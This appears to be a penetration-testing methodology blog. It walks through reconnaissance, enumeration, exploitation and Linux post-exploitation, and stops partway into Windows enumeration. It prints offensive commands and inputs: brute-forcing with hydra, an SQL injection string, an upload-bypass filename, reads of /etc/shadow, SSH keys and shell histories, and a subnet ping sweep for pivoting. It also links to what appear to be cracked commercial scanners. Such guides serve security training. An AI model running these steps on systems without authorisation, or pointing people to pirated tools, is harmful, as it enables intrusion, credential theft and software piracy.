Introduction
Vulnerability Assessment and Penetration Testing (VAPT) is often misunderstood by beginners as simply running automated scanners. In reality, professional security assessments follow a structured methodology that combines reconnaissance, enumeration, vulnerability discovery, exploitation, and impact analysis. We are gonna kill it phase-wise. Also, I have attached some sources to refer to at the end of this blog.
# Phase 0 — Engagement Kickoff & Preparation
Goal: Establish legal authorization, define scope boundaries, and ensure operational readiness before starting testing.
Establish legal authorization, scope boundaries, and operational readiness before testing begins.
Key activities:
- scope definition
- allowed techniques
- rules of engagement
- testing window
- IP whitelisting
- environment preparation
Burpsuite pro - https://github.com/xiv3r/Burpsuite-Professional
Acunetix pro - https://youtu.be/jPQ3TD73hrI?si=u2MW-B_Q9hUZIRvt
https://drive.google.com/file/d/1-JTJzE6KBCejtwbLJ4zhniVQpYve1qMz/view?usp=sharing# Phase 1 — Passive Reconnaissance (OSINT)
Passive reconnaissance is the first technical phase of a VAPT engagement. In this stage, the tester gathers intelligence without directly interacting with the target infrastructure.
This phase helps answer several key questions:
- What assets belong to the organization?
- What infrastructure is publicly exposed?
- What technologies are being used?
- What historical or leaked data may exist?
Unlike active scanning, passive reconnaissance does not send intrusive traffic to the target systems. Instead, it relies on publicly available information, threat intelligence platforms, and historical records.
The output of this phase should provide:
• Root domains
• Subdomains
• DNS records
• Infrastructure ownership
• Technology stack
• Email formats
• Historical assets
• Potential credential leaks1.1 Domain & DNS Intelligence
The first step in reconnaissance is identifying the organization's domain footprint and DNS configuration.
This helps reveal:
- subdomains
- mail servers
- DNS infrastructure
- certificate transparency records
- CDN or proxy usage
These discoveries form the foundation of the entire attack surface.
Tools Used
Typical platforms and tools include:
- SecurityTrails
- DNSDumpster
- Netcraft
- Pentest-Tools DNS lookup
- crt.sh
- Shodan
- dig or google toolbox if you want a web interface
- nslookup
- whois
- dnsrecon
Identify
During DNS intelligence gathering, attempt to identify:
• Root domain
• Subdomains
• MX records
• NS records
• TXT records
• Historical SSL certificates
• DNS provider
• CDN or proxy infrastructureCommand-Line Enumeration
WHOIS Lookup
WHOIS reveals domain ownership details and registrar information.
whois example.comUseful information may include:
Registrar
Name servers
Registration dates
Administrative contactsDNS Record Enumeration
Use dig to retrieve DNS records.
dig example.comQuery specific record types:
dig example.com MX
dig example.com NS
dig example.com TXT
dig example.com ANYExample:
dig example.com MX +shortThis returns mail servers used by the organization.
Using nslookup
Another DNS querying tool:
nslookup example.comQuery mail servers:
nslookup -query=MX example.comQuery name servers:
nslookup -query=NS example.comAutomated DNS Enumeration
Use dnsrecon to perform automated enumeration.
dnsrecon -d example.comBrute forcing subdomains:
dnsrecon -d example.com -D wordlist.txt -t brtThis may reveal hidden subdomains.
Certificate Transparency Enumeration
Certificate logs often reveal additional subdomains.
Search:
https://crt.sh/?q=%25.example.comLook for:
dev.example.com
staging.example.com
vpn.example.com
mail.example.com
These are frequently missed during normal DNS lookups.Cross Verification
Always verify results across multiple sources:
- SecurityTrails
- Netcraft
- crt.sh
- DNS queries
Many tools miss subdomains, so combining sources improves coverage.
1.2 Infrastructure & ASN Mapping
After identifying domains, the next step is mapping the organization's infrastructure ownership.
Organizations often control IP ranges associated with their Autonomous System Number (ASN).
This allows testers to discover:
• IP ranges owned by the organization
• hosting providers
• exposed services
• shadow infrastructureTools Used
Common platforms include:
- Shodan
- Censys
- BGP.he.net
- DNSDumpster
- ASN-to-CIDR mapping services
Identify
Focus on identifying:
• ASN number
• CIDR ranges
• hosting providers
• internet-facing servicesExample Workflow
Find ASN Information
Search the domain in BGP databases:
https://bgp.he.net/Example result:
AS13335
AS16509Convert ASN to CIDR Ranges
Once the ASN is known, determine associated IP ranges.
Example output:
104.16.0.0/13
172.64.0.0/13These ranges may belong to the target organization.
Investigate IP Ranges
Query Shodan for exposed services:
org:"Example Company"or
net:104.16.0.0/13Shodan may reveal:
open ports
web servers
VPN gateways
RDP services
IoT devicesNote:
Shodan and Censys results must be validated during active reconnaissance later.
1.3 Technology Stack Identification
Understanding the technology stack helps guide later testing.
For example:
Apache + PHP → LFI, upload issues
Node.js → API vulnerabilities
WordPress → plugin vulnerabilitiesTools Used
Typical tools include:
- Wappalyzer
- BuiltWith
- WhatWeb
Command-Line Fingerprinting
Using WhatWeb
WhatWeb can identify web technologies automatically.
whatweb https://example.comExample output:
Apache
PHP
WordPress
jQuery
CloudflareHTTP Header Analysis
Headers often reveal server technologies.
Using curl:
curl -I https://example.comExample response:
Server: nginx
X-Powered-By: PHP/8.1Using wget
Headers can also be inspected with wget.
wget --server-response --spider https://example.comBrowser Developer Tools
Inspect:
• Network responses
• JavaScript libraries
• cookies
• API endpointsThis often reveals hidden frameworks.
1.4 Email & Credential OSINT
Email enumeration helps understand:
• employee structure
• email naming conventions
• potential credential leaksIt also assists in:
phishing simulations
password spraying
identity enumerationTools Used
Common tools include:
- Google dorking
- Hunter.io
- Apollo.io
- IntelX
- HaveIBeenPwned
- linkedin2username (there are other resources as well loike snurfbase)
- Hudson Rock
- theHarvester
Email Enumeration
Example using theHarvester:
theHarvester -d example.com -b allExample sources:
Google
Bing
LinkedIn
PGP key serversLinkedIn Enumeration
Employee lists can be converted into username formats.
Example:
linkedin2username -u https://linkedin.com/company/example -c 200This generates potential username lists.
Breach Data Search
Check if credentials appear in breaches.
Search using:
- HaveIBeenPwned
- IntelX
- Hudson Rock
- appolo.io
- hunter.io
Example:
email@example.comPossible findings:
password hashes
credential leaks
old passwordsOnly passive verification should be performed at this stage.
1.5 Historical Presence & Legacy Exposure
Many organizations remove applications but forget to disable endpoints.
Historical archives can reveal:
• legacy admin panels
• old APIs
• deprecated login portals
• forgotten subdomainsTools Used
- Wayback Machine
- Common Crawl
- Internet Archive
- Time machine
Extract Historical URLs
Example search:
https://web.archive.org/web/*/example.comLook for paths such as:
/admin
/backup
/api/v1
/staging
/devThese endpoints may still exist.
Correlate With Current Assets
Combine:
historical URLs
current subdomain list
active endpointsLegacy endpoints often lead to high-impact vulnerabilities.
1.6 Cloud & SaaS Footprint Identification
Many organizations rely heavily on cloud infrastructure.
Typical services include:
AWS
Azure
Google Cloud
Auth0
Stripe
CRM systemsIdentifying cloud infrastructure helps reveal:
storage buckets
API gateways
serverless functions
authentication providersTools Used
- Shodan
- Censys
- GitHub search
- Google dorking
Example Searches
Search GitHub for exposed references:
"example.com" aws
"example.com" api_key
"example.com" secretGoogle dorks:
site:github.com "example.com"
site:pastebin.com "example.com"1.7 Public Code & Configuration Leakage
Developers sometimes accidentally publish internal code or configuration files.
These may expose:
API keys
database credentials
internal endpoints
configuration secretsTools Used
Typical tools include:
- TruffleHog
- Gitrob
- Gato
- BBOT
GitHub Secret Scanning
Example:
trufflehog https://github.com/example/repositoryThis scans commit history for:
API keys
private tokens
AWS credentials
passwordsWhat to Look For
Common secrets:
AWS_ACCESS_KEY
DB_PASSWORD
JWT_SECRET
API_KEYAlso check for:
internal IP addresses
private repositories
configuration filesOutput of Phase 1
By the end of Passive Reconnaissance, you should have collected:
• root domains
• subdomains
• DNS records
• ASN and infrastructure mapping
• technology stack
• email patterns
• leaked credentials (if any)
• historical endpoints
• potential cloud infrastructure
• publicly exposed code or secretsThis information becomes the foundation for Phase 2 — Active Reconnaissance and Enumeration, where discovered assets are validated and expanded.
_> Engagement Strategy & Operator Notes
A structured VAPT methodology should not be treated as a rigid checklist where every step is executed blindly. In real-world engagements, efficiency, stealth, and decision-making play a critical role in determining success. At every phase, the tester must make informed decisions based on observed behavior rather than strictly following all possible techniques. For example, if a Web Application Firewall (WAF) is detected to be aggressive, fuzzing intensity should be reduced, payloads should be encoded or obfuscated, and more reliance should be placed on passive analysis and bypass techniques. Similarly, if subdomain enumeration yields minimal results, effort should be redirected toward ASN expansion and infrastructure-level discovery. If APIs are identified early, priority should shift toward API-specific testing rather than traditional web fuzzing. Login panels, authentication flows, and exposed administrative interfaces should always be treated as high-value targets and tested early in the engagement.
Time and resource management is equally important. Not all tools and scans should be executed simultaneously without purpose. High-value targets such as authentication endpoints, exposed services, and known vulnerable components should be prioritized over blind scanning. Automated tools like OWASP ZAP may generate excessive noise and trigger defensive mechanisms, whereas tools like Nuclei provide fast coverage but require proper template selection to avoid irrelevant results. Burp Suite Scanner offers deeper analysis but at the cost of time and resource consumption. Therefore, understanding the trade-off between coverage, depth, and noise is essential.
False positives are a common issue in automated scanning and must always be handled systematically. Every identified vulnerability should be manually validated by reproducing the issue without scanner-generated payloads, ensuring consistent behavior across multiple attempts, and confirming real impact. A finding should only be considered valid if it is reproducible and demonstrably exploitable under controlled conditions.
Evidence collection must follow a consistent structure to ensure findings are clear and report-ready. Each validated issue should include the complete request and response pair, affected endpoint, timestamp, reproduction steps, and a concise impact explanation. Screenshots and session artifacts should support the proof-of-concept but not replace technical validation.
Testing should also adapt based on engagement mode. In stealth mode, the focus should be on passive reconnaissance, low request rates, and manual testing to avoid detection. In aggressive mode, full-scale fuzzing, automated scanners, and high request volumes can be used when detection is not a concern. Choosing the appropriate mode depends on scope, rules of engagement, and target sensitivity.
A common mistake in VAPT engagements is over-reliance on automated tools while ignoring deeper analysis areas such as JavaScript files, API endpoints, and business logic flaws. Many critical vulnerabilities exist in logic rather than input validation and require manual exploration. Similarly, skipping authentication and authorization testing or failing to validate subdomains properly can result in missed high-impact findings.
Finally, vulnerabilities should never be viewed in isolation. Real-world attackers chain multiple weaknesses together to achieve meaningful impact. Instead of focusing only on individual issues, the tester should continuously think in terms of attack paths — identifying entry points, escalation opportunities, and potential impact. The ultimate goal is not just to find vulnerabilities, but to demonstrate how they can be combined to compromise the system in a realistic scenario.
# Phase 2 — Active Reconnaissance & Enumeration
Active reconnaissance is the phase where we begin direct interaction with the target infrastructure.
Unlike passive reconnaissance, this phase involves: • Sending requests • Validating discovered assets • Expanding attack surface • Mapping real entry points
The goal is to convert collected intelligence into exploitable attack surface.
2.1 Subdomain Validation & Expansion
After collecting subdomains during passive reconnaissance, the next step is to validate and expand them.
Not all discovered subdomains are alive. Some may:
- No longer exist
- Be internal-only
- Be legacy endpoints
At the same time, active techniques help uncover additional hidden subdomains, especially across staging and development environments.
Tools Used
- Amass
- Sublist3r
- Subbrute
- Subfinder
- ffuf
- puredns
- httpx
- crt.sh
- SecurityTrails
- GitHub / GitLab
Start by validating collected subdomains and checking which ones are live:
subfinder -d example.com | httpx -web-server -method -websocket -ipThis helps identify:
- Live hosts
- Response behavior
- Associated IP addresses
For deeper enumeration, use active techniques:
amass enum -active -d example.comBruteforcing subdomains:
ffuf -u https://FUZZ.example.com -w wordlist.txt High-speed resolution with PureDNS:
puredns bruteforce wordlist.txt example.com -r resolvers.txtThings to identify:
- Live vs dead subdomains
- Dev / staging environments
- IP mappings per subdomain
Subdomains that are not reachable should still be investigated. Check them in the Wayback Machine to understand their historical usage.
These often expose:
- Deprecated applications
- Old admin panels
- Legacy APIs
2.2 WAF & Defense Validation
Before performing aggressive enumeration or fuzzing, it is important to understand the defensive mechanisms protecting the target.
Modern applications are often protected by:
- Web Application Firewalls (WAF)
- CDNs (Cloudflare, Akamai, etc.)
- Rate limiting systems
These controls directly impact how you perform testing.
Tools Used
- wafw00f
- WhatWAF
- Burp Suite
Start by identifying whether a WAF is present:
wafw00f https://target.comIn addition to automated tools, manually inspect responses using Burp Suite:
- Look for security headers
- Observe blocked requests
- Identify unusual response patterns
Things to identify:
- WAF presence
- Vendor (Cloudflare, Akamai, etc.)
- Response behavior under load
Test for:
- Rate limiting
- Request blocking thresholds
- Payload filtering
Sometimes multiple WAF layers exist (e.g., CDN + backend firewall), so behavior testing is important.
This step helps you:
- Tune fuzzing speed
- Avoid IP bans
- Adjust payload encoding
2.3 Network & Service Enumeration
Once subdomains and IPs are identified, the next step is to enumerate open ports and services.
This should include:
- IPs mapped from subdomains
- IP ranges derived from ASN
Tools Used
- Nmap
- Naabu
- Masscan
- Netcat
- hping3
Start with a full scan:
nmap -p- -A target.comFor faster scanning:
naabu -host target.comYou can also scan ASN-derived IP ranges for additional assets.
Things to identify:
- Open ports
- Running services
- Service versions
Cross-verify findings with:
- Shodan
- Censys
This ensures:
- Accuracy
- Removal of false positives
Open ports directly define your attack surface. For example:
- 22 → SSH attacks
- 80/443 → Web vulnerabilities
- 445 → SMB exploitation
2.4 Web Application Mapping
This phase focuses on building a complete map of the application.
Understanding the structure helps identify:
- Attack entry points
- Functional flows
- Hidden endpoints
Tools Used
- Burp Suite Pro (crawler & sitemap)
- ffuf
- dirsearch
- feroxbuster
- gospider
- katana
- gau
- kiterunner
- sub404
Start by crawling the application using Burp Suite and generating a sitemap.
For directory and endpoint enumeration:
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursionCrawling using Katana:
katana -jc -u https://target.comThings to identify:
- Hidden directories
- API endpoints
- Parameters
- Third-party integrations
Pay close attention to:
- File upload/download functionality
- Authentication flows
- Admin/debug endpoints
This step results in a complete application attack surface map.
2.5 JavaScript Enumeration & Drift Analysis
JavaScript files often contain critical hidden information that is not visible during normal browsing.
These files may expose:
- Internal APIs
- Hardcoded secrets
- Hidden functionality
Tools Used
- LinkFinder
- Burp JSLinkFinder
- getJS
- jsluice
- jsleak
Extract JavaScript files from:
- Burp Suite
- Crawlers
- Browser DevTools
Focus on keyword searching:
- api
- key
- token
- password
- admin
Also analyze:
- DOM sources and sinks
- Client-side validation
This helps identify:
- Hidden endpoints
- DOM-based vulnerabilities
JavaScript analysis is often a high-signal step for finding deeper attack vectors.
2.6 CMS & Framework-Specific Enumeration
If a CMS or framework is identified, perform targeted enumeration.
Different platforms have different weaknesses. For example:
- WordPress → plugin vulnerabilities
- Joomla → extension issues
- AEM → misconfigurations
Tools Used
- WPScan
- CMSmap
- joomscan
- wprecon
- pyfiscan
- aemscan
Example WordPress scan:
wpscan --url https://target.comThings to identify:
- Installed plugins
- Themes
- Versions
Outdated components often map directly to:
- Known CVEs
- Public exploits
This step allows for focused vulnerability testing instead of blind fuzzing.
2.7 Application Error Handling Enumeration
Error messages can reveal sensitive backend information.
These are often triggered during:
- Invalid inputs
- Broken requests
- Edge-case scenarios
Tools Used
- Burp Suite
- Arjun
Example parameter discovery:
arjun -u https://target.comThings to identify:
- Stack traces
- Debug messages
- Backend file paths
These leaks may expose:
- Internal logic
- Database structure
- Framework behavior
2.8 HTTP Method Enumeration
Applications sometimes expose unintended HTTP methods.
These can lead to unexpected behavior or security issues.
Check supported methods:
- OPTIONS request
- Manual testing via Burp
Things to identify:
- PUT
- DELETE
- PATCH
Misconfigured methods may allow:
- Unauthorized file uploads
- Data modification
- Access control bypass
2.9 Content-Type & Serialization Enumeration
Different content types introduce different attack surfaces.
Understanding how the application processes data is critical.
Identify usage of:
- JSON
- XML
- multipart/form-data
These can lead to:
- XXE (XML)
- API abuse (JSON)
- Deserialization attacks
Also observe:
- Request/response formats
- Backend parsing behavior
This step prepares you for deep vulnerability testing in Phase 3.
WHAT WE HAVE TILL NOW
At this stage, we have:
Validated and expanded subdomains
IP mappings (domain + ASN)
Open ports and services
Full application sitemap
Endpoints and parameters
JavaScript-derived intelligence
WAF behavior and defenses
CMS-specific attack surface
Email and breach context (from Phase 1)# Phase 3 — Vulnerability Discovery & Validation
This phase focuses on identifying, validating, and prioritizing vulnerabilities across the entire attack surface discovered in earlier phases.
The goal is not just to find issues, but to:
- Confirm exploitability
- Eliminate false positives
- Understand real attack impact
3.1 Automated Vulnerability Scanning
Automated scanning provides a broad coverage baseline by identifying known vulnerabilities, misconfigurations, and exposed services.
Different scanners use different approaches:
- Signature-based detection
- Behavior-based analysis
- Template-driven scanning
Tools Used
- Burp Suite Pro (Scanner)
- Nessus
- Acunetix
- Nikto
- Nmap NSE
- Nuclei
- Sn1per
- BlackWidow
- flan
- jaeles
- Osmedeus
- OWASP ZAP (noisy)
Run scans against:
- Verified subdomains
- Key application endpoints
- Identified IPs and services
Example Nuclei scan:
nuclei -u target.com -t cvesNmap NSE scan:
nmap --script vuln target.comRun scans from:
- Local machine
- VPS (for scalability and parallel execution)
Important: All automated findings must be manually validated to remove false positives.
Output of this step:
- Initial vulnerability list
- Scanner-based indicators
3.2 403 / 404 Bypass Techniques
Applications often restrict access to sensitive endpoints using status codes like 403 Forbidden or hidden routes.
These protections are frequently bypassable.
Tools Used
- XFFenum
- NoMore403
- Forbidden Buster
These tools attempt bypass techniques such as:
- Header manipulation (X-Forwarded-For, etc.)
- Path traversal variations
- Encoding tricks
Things to identify:
- Hidden admin panels
- Restricted APIs
- Internal endpoints
3.3 Origin IP Discovery
If the application is behind a CDN or WAF, identifying the origin IP can allow direct access to the backend server.
Tools Used
- CloudRip
- hakoriginfinder
These tools help:
- Identify real server IP behind CDN
- Bypass WAF protections
Once identified, the origin IP should be:
- Scanned directly
- Tested for exposed services
3.4 Brute Force & Password Spraying
Authentication systems are often vulnerable to:
- Weak credentials
- Credential reuse
- Poor rate limiting
Tools Used
- Burp Suite (Intruder — cluster bomb with IP rotation)
- owabrute
- hydra
- DefaultCreds cheat sheet
Hydra example:
hydra -l admin -P passwords.txt target.com http-post-formThings to test:
- Login portals
- Email services
- Internal panels
Use:
- Credential lists from breach data
- Custom wordlists
Goal:
- Gain valid access without exploitation
3.5 Manual Web Vulnerability Testing
Automated tools miss logic-based vulnerabilities. Manual testing is where real vulnerabilities are confirmed.
Tools Used
- Burp Suite (Repeater, Intruder)
- Browser testing
- Custom payloads
- Awesome bug bounty tools (for exploitation support)
Techniques Used
- Parameter tampering
- Input validation testing
- Business logic analysis
Test for:
- SQL Injection
- XSS (Reflected, Stored, DOM-based)
- CSRF
- IDOR
- Open Redirect
- File Inclusion (LFI/RFI)
- Command Injection
- Template Injection
Activities:
- Test all parameters identified in Phase 2
- Modify requests manually
- Observe backend behavior
Goal:
- Confirm exploitability
- Understand impact
Output:
- Confirmed vulnerabilities
- Manual validation notes
3.6 Authentication & Authorization Testing
This step evaluates how well the application enforces identity and access control.
Tools Used
- Burp Suite
- Browser DevTools
Techniques Used
- Access control testing
- Session handling analysis
- Privilege boundary testing
Test for:
- Authentication bypass
- Weak password policies
- Session fixation
- Improper session invalidation
- Authorization bypass (horizontal & vertical)
Activities:
- Replay session tokens
- Modify user roles
- Access restricted endpoints
Goal:
- Identify privilege escalation paths
Output:
- Authentication weaknesses
- Authorization flaws
3.7 File Handling Vulnerability Testing
File upload and download functionality often leads to high-impact vulnerabilities.
Tools Used
- Burp Suite
- Manual payload crafting
Techniques Used
- File upload bypass
- Path manipulation
- File validation testing
Test for:
- Unrestricted file upload
- MIME-type bypass
- Extension bypass
- File overwrite
- Insecure file download (IDOR/LFI)
Activities:
- Upload crafted files
- Modify file paths
- Analyze storage behavior
Goal:
- Achieve file execution or sensitive data access
Output:
- File handling vulnerabilities
- RCE candidates
3.8 API Vulnerability Testing (If Applicable)
APIs expose structured attack surfaces and are often poorly secured.
Tools Used
- Burp Suite
- ffuf
- Postman
- fuzzapi
Techniques Used
- Endpoint abuse
- Method manipulation
- Object-level testing
Test for:
- Broken Object Level Authorization (BOLA)
- Excessive data exposure
- Improper method handling
- Mass assignment
Activities:
- Modify request bodies
- Change HTTP methods
- Test authorization controls
Output:
- API vulnerabilities
- Access control issues
3.9 Network & Service-Level Vulnerability Validation
Beyond web applications, services and infrastructure must also be tested.
Tools Used
- Nmap NSE
- Nessus
- Netcat
Techniques Used
- Misconfiguration testing
- Version-based validation
Activities:
- Validate scanner findings
- Map service versions to CVEs
- Interact manually with services
Goal:
- Confirm externally exploitable services
Output:
- Network-level vulnerabilities
- Service exploitation candidates
3.10 CMS & Component Vulnerability Validation
If CMS or frameworks are identified, validate vulnerabilities specific to them.
Tools Used
- WPScan
- Manual CVE testing
Activities:
- Test plugins and components
- Validate exploitability
- Remove false positives
Goal:
- Identify real exploitable components
Output:
- CMS-specific vulnerabilities
3.11 Vulnerability Correlation & Prioritization
At this stage, multiple vulnerabilities exist across different layers.
The goal is to connect them into meaningful attack paths.
Techniques Used
- Risk-based analysis
- Attack surface correlation
Activities:
- Correlate findings across:
- Web
- API
- Network
- Authentication
- File handling
Identify:
- Attack chains
- Weakest entry points
Prioritize based on:
- Impact
- Exploitability
- Exposure
Output:
- Prioritized vulnerability list
- Attack chain candidates
WHAT WE HAVE TILL NOW
At this stage, we have:
Validated vulnerabilities across web applications, APIs, and network services
Scanner-based findings filtered and manually verified (false positives removed)
Confirmed web vulnerabilities (SQLi, XSS, IDOR, LFI/RFI, command injection, etc.)
Authentication and authorization weaknesses identified
File handling vulnerabilities and potential RCE vectors
API-specific vulnerabilities (BOLA, mass assignment, improper access control)
Network/service-level vulnerabilities mapped with CVE correlation
CMS and component-level exploitable weaknesses
Successful 403/404 bypass vectors (if applicable)
Origin IP identified (if behind WAF/CDN) and tested
Valid credentials obtained via brute force / password spraying (if successful)
Curated credential lists and improved attack wordlists
Initial access points and multiple exploitation candidates# Phase 4 — Exploitation & Impact Assessment
This phase focuses on demonstrating real-world impact by safely exploiting validated vulnerabilities.
The objective is not to cause damage, but to:
- Prove exploitability
- Demonstrate business impact
- Build realistic attack scenarios
All actions should be controlled, minimal, and evidence-driven.
4.1 Exploitation Planning & Selection
Not all vulnerabilities should be exploited. This step ensures exploitation is targeted, safe, and meaningful.
Techniques Used
- Risk-based exploitation
- Controlled proof-of-concept execution
Select vulnerabilities based on:
- High impact
- High exploitability
- Low risk of system instability
Define:
- Exploitation goals (access, data exposure, execution)
- Success criteria
- Rollback and cleanup steps
This step ensures:
- No unnecessary disruption
- Clear direction for exploitation
Output:
- Exploitation plan
- Selected vulnerability set
4.2 Web Application Exploitation
This step focuses on exploiting vulnerabilities in the application layer.
Tools Used
- Burp Suite
- Custom payloads
- Manual browser testing
Techniques Used
- Payload-based exploitation
- Business logic abuse
- Use of GTFOBins and PayloadsAllTheThings
Exploit:
- SQL Injection → extract limited data
- XSS → controlled payload execution
- IDOR → unauthorized data access
- Authentication bypass
- Command / template injection
Example (SQLi testing in request):
' OR 1=1--Activities:
- Execute payloads in controlled manner
- Capture:
- Requests
- Responses
- Screenshots
- Session artifacts
Important:
- Limit exploitation to proof-of-impact only
- Avoid full data dumps or destructive actions
Output:
- Web exploitation PoCs
- Evidence artifacts
4.3 File Handling & RCE Exploitation
File-related vulnerabilities often lead to Remote Code Execution (RCE).
Tools Used
- Burp Suite
- Custom payloads
- Manual validation
Techniques Used
- Upload-based execution
- Path traversal exploitation
Exploit:
- Unrestricted file upload
- File inclusion → code execution
- Insecure file download → sensitive data access
Example upload bypass attempt:
shell.php.jpgActivities:
- Upload crafted files
- Attempt execution or retrieval
- Demonstrate:
- Arbitrary file read
- Limited command execution
Important:
- Avoid persistent shells unless explicitly allowed
- Keep execution non-destructive
Output:
- File-based exploitation PoCs
- RCE validation evidence
4.4 API Exploitation (If Applicable)
APIs often expose direct access to backend logic.
Tools Used
- Burp Suite
- Postman
Techniques Used
- Authorization abuse
- Data manipulation
Exploit:
- Broken Object Level Authorization (BOLA)
- Mass assignment
- Improper method handling
Activities:
- Modify request parameters
- Change object IDs
- Manipulate request bodies
Goal:
- Demonstrate unauthorized access
- Extract limited sensitive data
Output:
- API exploitation PoCs
- Unauthorized access evidence
4.5 Network & Service Exploitation
This step targets infrastructure-level vulnerabilities.
Tools Used
- Nmap
- Metasploit (msf)
- Netcat
- Service-specific tools
Techniques Used
- Service exploitation
- Misconfiguration abuse
Exploit:
- Weak authentication
- Known CVEs
- Exposed management interfaces
Example Metasploit usage:
use exploit/multi/handlerActivities:
- Exploit externally exposed services
- Validate access
Important:
- Avoid lateral movement unless required
- Do not cause service disruption
Output:
- Network/service exploitation evidence
- Access confirmation
4.6 Attack Chain Development
Individual vulnerabilities often become critical when combined together.
Techniques Used
- Chained exploitation
- Privilege escalation mapping
Activities:
- Combine multiple findings
- Demonstrate:
- Initial access
- Privilege escalation
- Expanded access
Example chain:
- IDOR → account access
- Weak auth → privilege escalation
- File upload → RCE
Focus on:
- Realistic attacker pathways
- Weakest entry points
Output:
- Attack chain diagrams
- End-to-end compromise scenarios
4.7 Impact Assessment
This step translates technical findings into business risk.
Assess
- Data confidentiality impact
- Integrity compromise
- Availability risk
- Regulatory/compliance impact
Activities
- Map vulnerabilities to real-world consequences
- Evaluate:
- Likelihood of exploitation
- Potential damage
Examples:
- Data leak → compliance violation
- RCE → full system compromise
- IDOR → unauthorized access
Output:
- Business impact assessment
- Risk justification
WHAT WE HAVE TILL NOW
At this stage, we have:
Validated and exploited high-impact vulnerabilities
Proof-of-concept (PoC) evidence for web, API, and network flaws
Demonstrated RCE and file-based exploitation (if applicable)
Confirmed unauthorized access via IDOR, auth bypass, or API flaws
Validated service-level exploitation and external access
Established realistic attack chains combining multiple weaknesses
Identified privilege escalation paths
Mapped technical vulnerabilities to real-world business impact
Collected complete evidence set (requests, responses, screenshots, artifacts)# Phase 5 — Post-Exploitation (Linux) — Enumeration & Privilege Escalation
Once initial access is obtained, the objective shifts from exploitation to control, escalation, and expansion.
Post-exploitation on Linux systems focuses on:
- Enumerating the system thoroughly
- Identifying privilege escalation paths
- Extracting sensitive information
- Preparing for pivoting
This phase determines how far access can be extended.
5.1 System Enumeration (Linux)
Enumeration is the most critical step in post-exploitation. Every privilege escalation vector depends on accurate system intelligence.
Tools Used
- LinEnum
- Linux Smart Enumeration (LSE)
Start by identifying the operating system:
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-releaseCheck kernel version and architecture:
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep LinuxEnvironment variables often reveal useful information:
env
set
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
cat ~/.zshrcApplications & Services Enumeration
Understanding running services is key to identifying privilege escalation vectors.
Check running processes:
ps aux
ps -elf
top
cat /etc/serviceIdentify services running as root:
ps aux | grep root
ps -elf | grep rootCheck installed applications:
dpkg -l
rpm -qaInspect scheduled jobs:
crontab -l
cat /etc/cron*
cat /etc/cron.d/*
cat /etc/cron.daily/*
cat /etc/cron.hourly/*
cat /etc/cron.monthly/*
cat /etc/crontab
cat /etc/anacrontabMisconfigured cron jobs are a common escalation vector.
Network & Communication Enumeration
Identify network interfaces and connections:
ifconfig
ip link
ip addr
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/networkCheck network configuration:
cat /etc/resolv.conf
cat /etc/networks
iptables -L
hostname
dnsdomainnameIdentify active connections and users:
lsof -i
netstat -antup
netstat -tulpn
last
wThis helps identify:
- Internal network access
- Lateral movement opportunities
User & Sensitive Data Enumeration
Identify users and privileges:
id
who
w
last
cat /etc/passwd
cat /etc/sudoers
sudo -lCheck sensitive files:
cat /etc/passwd
cat /etc/group
cat /etc/shadowExplore user directories:
ls -ahlR /root/
ls -ahlR /home/Search for credentials in files:
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfgCheck command history:
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.php_historyCheck for SSH keys:
cat ~/.ssh/*These often provide direct access to other systems.
File System Enumeration
Inspect mounted file systems:
mount
df -h
cat /etc/fstabFind world-writable files:
find / -xdev -type d -perm -0002 -ls 2> /dev/null
find / -xdev -type f -perm -0002 -ls 2> /dev/nullFind SUID binaries:
find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/nullSUID binaries are one of the most reliable privilege escalation vectors.
Capability & Tool Discovery
Check available tools:
which perl
which python
which python3
which gccCheck file transfer capabilities:
which wget
which nc
which netcatThis determines:
- Exploitation options
- Payload delivery methods
5.2 Privilege Escalation (Linux)
Once enumeration is complete, the next step is to escalate privileges.
Tools Used
- Traitor
- GTFOBins
- Linux Exploit Suggester
- LinPEAS
Common escalation paths include:
- SUID binaries
- Misconfigured sudo permissions
- Writable cron jobs
- Kernel vulnerabilities
Recent Linux vulnerabilities to check:
- DirtyPipe (CVE-2022–0847)
- PwnKit (CVE-2021–4034)
- Baron Samedit (CVE-2021–3156)
Approach:
- Match kernel version with known exploits
- Check sudo permissions (
sudo -l) - Analyze writable scripts
5.3 Post-Exploitation Actions
After privilege escalation, controlled actions may include:
- Service interaction or disruption (only if allowed)
- Uploading controlled payloads
- Creating persistence mechanisms
- Data exfiltration (limited and approved)
All actions must remain:
- Non-destructive
- Within engagement scope
5.4 Pivoting & Internal Network Discovery
Once access is obtained, the compromised system can be used as a pivot point.
Identify internal hosts:
for host in {1..154}; do ping -c1 192.168.1.$host | grep -B1 "1 received" | grep "statistics" | cut -d " " -f2; done | tee hosts.txtThis helps:
- Discover internal systems
- Expand attack surface
Next steps:
- Scan internal network
- Identify additional targets
- Perform lateral movement
Phase 5 — Post-Exploitation (Windows) — Enumeration, Privilege Escalation & Active Directory Attacks
Once access to a Windows system is obtained, the objective shifts to enumeration, privilege escalation, credential extraction, and lateral movement.
In enterprise environments, this phase typically evolves into Active Directory (AD) exploitation, where the ultimate goal is:
Domain Admin / full domain compromise
5.1 User & Privilege Enumeration
The first step is to understand the current security context.
Tools Used
- Built-in Windows commands
- PowerShell
Check current user and privileges:
whoami
whoami /priv
whoami /groups
whoami /allPowerShell alternative:
[System.Security.Principal.WindowsIdentity]::GetCurrent()Things to identify:
- Current user privileges
- Enabled privileges (SeDebug, SeImpersonate, etc.)
- Group memberships
These determine possible escalation paths.
5.2 Local Users & Group Enumeration
Understanding local accounts helps identify privileged access paths.
Tools Used
- net commands
- PowerShell
List local users:
net userCheck administrator group:
net localgroup administratorsPowerShell:
Get-LocalUser
Get-LocalGroupMember AdministratorsIf domain joined:
net user /domain
net group "Domain Admins" /domainThings to identify:
- Admin accounts
- Privileged groups
- Domain users
5.3 System & Network Enumeration
Gather system and network information to identify vulnerabilities.
Tools Used
- Built-in commands
- PowerShell
System details:
systeminfoNetwork configuration:
ipconfig /all
route print
